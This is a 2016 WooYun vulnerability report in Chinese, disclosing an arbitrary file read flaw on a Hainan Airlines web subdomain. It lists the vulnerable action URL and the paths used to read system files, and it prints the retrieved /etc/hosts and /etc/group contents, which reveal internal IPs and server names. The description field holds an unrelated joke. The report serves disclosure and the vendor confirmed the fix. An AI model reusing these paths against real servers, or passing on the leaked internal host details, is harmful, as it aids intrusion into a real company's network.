当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207570

漏洞标题:神器而已之海南航空存在任意文件读取漏洞

相关厂商:hnair.com

漏洞作者: 路人甲

提交时间:2016-05-11 17:57

修复时间:2016-06-27 11:30

公开时间:2016-06-27 11:30

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-13: 厂商已经确认,细节仅向厂商公开
2016-05-23: 细节向核心白帽子及相关领域专家公开
2016-06-02: 细节向普通白帽子公开
2016-06-12: 细节向实习白帽子公开
2016-06-27: 细节向公众公开

简要描述:

昨天我妈她们以前的几个老同事聚会。回来时,她给我提了一兜子菜。
我高兴坏了,边喷香的吃,边问我妈:妈!你怎么好意思往回提菜的?你们都不炫富啊?
我妈一脸不以为然:吃吧,没事!我都是给她们说我拿回来喂狗的……

详细说明:

http://zzgq.hnair.com/frontend/ticketChange/ticketChange_toTicketChange.action


文件读取.png


http://zzgq.hnair.com/tang/passwd


代理目录.png


http://zzgq.hnair.com/tang/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
10.2.40.141 petsrvhk51
10.72.14.21 ldapserver1.eking.com
10.72.14.22 ldapserver2.eking.com
10.2.40.159 pangu.loyoyo.com
10.2.40.156 webcki.travelsky.com
10.71.84.10 hadoopdn1
#discount ticket access jiesuan oracle
10.2.41.64 hnajs01-vip
10.2.41.66 hnajs02-vip


http://zzgq.hnair.com/tang/group
root:x:0:
bin:x:1:bin,daemon
daemon:x:2:bin,daemon
sys:x:3:bin,adm
adm:x:4:adm,daemon
tty:x:5:
disk:x:6:
lp:x:7:daemon
mem:x:8:
kmem:x:9:
wheel:x:10:
mail:x:12:mail,postfix
uucp:x:14:
man:x:15:
games:x:20:
gopher:x:30:
video:x:39:
dip:x:40:
ftp:x:50:
lock:x:54:
audio:x:63:
nobody:x:99:
users:x:100:
floppy:x:19:
vcsa:x:69:
utmp:x:22:
utempter:x:35:
cdrom:x:11:
tape:x:33:
dialout:x:18:
saslauth:x:76:
postdrop:x:90:
postfix:x:89:
fuse:x:499:
sshd:x:74:
jd:x:501:
pn:x:502:
8l:x:503:
gs:x:504:
resc:x:505:
dt:x:506:
ntp:x:38:
rpc:x:32:
rpcuser:x:29:
nfsnobody:x:65534:
nagios:x:507:
logsee:x:508:
sysadm:x:800:
usr01:x:801:
tcpdump:x:72:
nscd:x:28:
ldap:x:55:
td-agent:x:498:
gsbak:x:3002:
pnbak:x:3003:
8lbak:x:3004:
apollo:x:3005:
mobser:x:3006:
ota:x:3007:
memcached:x:497:
y8:x:3008:
hadoop:x:3009:


漏洞证明:

1000-7

修复方案:

补丁该打了,运维也该*了,能动手尽量不跟运维bb。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-05-13 11:26

厂商回复:

谢谢,我们会立即进行整改。

最新状态:

暂无